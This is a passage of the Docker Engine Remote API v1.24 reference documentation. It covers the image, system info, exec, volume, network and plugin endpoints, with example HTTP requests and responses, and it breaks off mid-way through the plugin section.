no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.24/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.24/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search +- **limit** – maximum returned search results +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `stars=` + - `is-automated=(true|false)` + - `is-official=(true|false)` + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 3.3 Misc + +#### Check auth configuration + +`POST /auth` + +Validate credentials for a registry and get identity token, +if available, for accessing the registry without password. + +**Example request**: + + POST /v1.24/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + + { + "Status": "Login Succeeded", + "IdentityToken": "9cbaf023786cd7..." + } + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.24/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Architecture": "x86_64", + "ClusterStore": "etcd://localhost:2379", + "CgroupDriver": "cgroupfs", + "Containers": 11, + "ContainersRunning": 7, + "ContainersStopped": 3, + "ContainersPaused": 1, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelMemory": true, + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OSType": "linux", + "OperatingSystem": "Boot2Docker", + "Plugins": { + "Volume": [ + "local" + ], + "Network": [ + "null", + "host", + "bridge" + ] + }, + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SecurityOptions": [ + "apparmor", + "seccomp", + "selinux" + ], + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemStatus": [["State", "Healthy"]], + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.24/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.12.0", + "Os": "linux", + "KernelVersion": "3.19.0-23-generic", + "GoVersion": "go1.6.3", + "GitCommit": "deadbee", + "Arch": "amd64", + "ApiVersion": "1.24", + "BuildTime": "2016-06-14T07:09:13.444803460+00:00", + "Experimental": true + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.24/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.24/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, load, pull, push, save, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +Docker daemon report the following event: + + reload + +**Example request**: + + GET /v1.24/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Server: Docker/1.12.0 (linux) + Date: Fri, 29 Apr 2016 15:18:06 GMT + Transfer-Encoding: chunked + + { + "status": "pull", + "id": "alpine:latest", + "Type": "image", + "Action": "pull", + "Actor": { + "ID": "alpine:latest", + "Attributes": { + "name": "alpine" + } + }, + "time": 1461943101, + "timeNano": 1461943101301854122 + } + { + "status": "create", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101381709551 + } + { + "status": "attach", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "attach", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101383858412 + } + { + "Type": "network", + "Action": "connect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943101, + "timeNano": 1461943101394865557 + } + { + "status": "start", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "start", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101607533796 + } + { + "status": "resize", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "resize", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "height": "46", + "image": "alpine", + "name": "my-container", + "width": "204" + } + }, + "time": 1461943101, + "timeNano": 1461943101610269268 + } + { + "status": "die", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "die", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "exitCode": "0", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105079144137 + } + { + "Type": "network", + "Action": "disconnect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943105, + "timeNano": 1461943105230860245 + } + { + "status": "destroy", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "destroy", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105338056026 + } + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + - `type=`; -- either `container` or `image` or `volume` or `network` or `daemon` + - `volume=`; -- volume to filter + - `network=`; -- network to filter + - `daemon=`; -- daemon name or id to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.24/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.24/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.24/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"status":"Loading layer","progressDetail":{"current":32768,"total":1292800},"progress":"[= ] 32.77 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":65536,"total":1292800},"progress":"[== ] 65.54 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":98304,"total":1292800},"progress":"[=== ] 98.3 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":131072,"total":1292800},"progress":"[===== ] 131.1 kB/1.293 MB","id":"8ac8bfaff55a"} + ... + {"stream":"Loaded image: busybox:latest\n"} + +**Example response**: + +If the "quiet" query parameter is set to `true` / `1` (`?quiet=1`), progress +details are suppressed, and only a confirmation message is returned once the +action completes. + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"stream":"Loaded image: busybox:latest\n"} + +**Query parameters**: + +- **quiet** – Boolean value, suppress progress details during load. Defaults + to `0` / `false` if omitted. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "DetachKeys": "ctrl-p,ctrl-q", + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **DetachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.24/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.24/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.24/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CanRemove": false, + "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126", + "DetachKeys": "", + "ExitCode": 2, + "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b", + "OpenStderr": true, + "OpenStdin": true, + "OpenStdout": true, + "ProcessConfig": { + "arguments": [ + "-c", + "exit 2" + ], + "entrypoint": "sh", + "privileged": false, + "tty": true, + "user": "1000" + }, + "Running": false + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 3.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.24/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis", + "Labels": null, + "Scope": "local" + } + ], + "Warnings": [] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. Available filters: + - `name=` Matches all or part of a volume name. + - `dangling=` When set to `true` (or `1`), returns all volumes that are "dangling" (not in use by a container). When set to `false` (or `0`), only volumes that are in use by one or more containers are returned. + - `driver=` Matches all or part of a volume driver name. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.24/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + }, + "Driver": "custom" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "custom", + "Mountpoint": "/var/lib/docker/volumes/tardis", + "Status": { + "hello": "world" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + }, + "Scope": "local" + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. +- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. +- **Labels** - Labels to set on the volume, specified as a map: `{"key":"value","key2":"value2"}` + +**JSON fields in response**: + +Refer to the [inspect a volume](#inspect-a-volume) section or details about the +JSON fields returned in the response. + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /v1.24/volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "custom", + "Mountpoint": "/var/lib/docker/volumes/tardis/_data", + "Status": { + "hello": "world" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + }, + "Scope": "local" + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +**JSON fields in response**: + +The following fields can be returned in the API response. Empty fields, or +fields that are not supported by the volume's driver may be omitted in the +response. + +- **Name** - Name of the volume. +- **Driver** - Name of the volume driver used by the volume. +- **Mountpoint** - Mount path of the volume on the host. +- **Status** - Low-level details about the volume, provided by the volume driver. + Details are returned as a map with key/value pairs: `{"key":"value","key2":"value2"}`. + The `Status` field is optional, and is omitted if the volume driver does not + support this feature. +- **Labels** - Labels set on the volume, specified as a map: `{"key":"value","key2":"value2"}`. +- **Scope** - Scope describes the level at which the volume exists, can be one of + `global` for cluster-wide or `local` for machine level. The default is `local`. + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). + +**Example request**: + + DELETE /v1.24/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 3.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.24/networks?filters={"type":{"custom":true}} HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query parameters**: + +- **filters** - JSON encoded network list filter. The filter value is one of: + - `driver=` Matches a network's driver. + - `id=` Matches all or part of a network id. + - `label=` or `label==` of a network label. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.24/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "net01", + "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.19.0.0/16", + "Gateway": "172.19.0.1" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal": false, + "Containers": { + "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": { + "Name": "test", + "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a", + "MacAddress": "02:42:ac:13:00:02", + "IPv4Address": "172.19.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.24/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "EnableIPv6": true, + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + }, + { + "Subnet":"2001:db8:abcd::/64", + "Gateway":"2001:db8:abcd::1011" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal":true, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **403** - operation not supported for pre-defined networks +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **Internal** - Restrict external access to the network +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` + - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}` +- **EnableIPv6** - Enable IPv6 on the network +- **Options** - Network specific options to be used by the drivers +- **Labels** - Labels to set on the network, specified as a map: `{"key":"value" [,"key2":"value2"]}` + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "EndpointConfig": { + "IPAMConfig": { + "IPv4Address":"172.24.56.89", + "IPv6Address":"2001:db8::5689" + } + } +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **403** - operation not supported for swarm scoped networks +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "Force":false +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **403** - operation not supported for swarm scoped networks +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network +- **Force** - Force the container to disconnect from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). + +**Example request**: + + DELETE /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such network +- **500** - server error + +### 3.6 Plugins (experimental) + +#### List plugins + +`GET /plugins` + +Returns information about installed plugins. + +**Example request**: + + GET /v1.24/plugins HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Id": "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078", + "Name": "tiborvass/no-remove", + "Tag": "latest", + "Active": true, + "Config": { + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Env": [ + "DEBUG=1" + ], + "Args": null, + "Devices": null + }, + "Manifest": { + "ManifestVersion": "v0", + "Description": "A test plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Interface": { + "Types": [ + "docker.volumedriver/1.0" + ], + "Socket": "plugins.sock" + }, + "Entrypoint": [ + "plugin-no-remove", + "/data" + ], + "Workdir": "", + "User": { + }, + "Network": { + "Type": "host" + }, + "Capabilities": null, + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Devices": [ + { + "Name": "device", + "Description": "a host device to mount", + "Settable": null, + "Path": "/dev/cpu_dma_latency" + } + ], + "Env": [ + { + "Name": "DEBUG", + "Description": "If set, prints debug messages", + "Settable": null, + "Value": "1" + } + ], + "Args": { + "Name": "args", + "Description": "command line arguments", + "Settable": null, + "Value": [ + + ] + } + } + } +] +``` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Install a plugin + +`POST /plugins/pull?name=` + +Pulls and installs a plugin. After the plugin is installed, it can be enabled +using the [`POST /plugins/(plugin name)/enable` endpoint](#enable-a-plugin). + +**Example request**: + +``` +POST /v1.24/plugins/pull?name=tiborvass/no-remove:latest HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. When using +this endpoint to pull a plugin from the registry, the `X-Registry-Auth` header +can be used to include a base64-encoded AuthConfig object. Refer to the [create +an image](#create-an-image) section for more details. + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json +Content-Length: 175 + +[ + { + "Name": "network", + "Description": 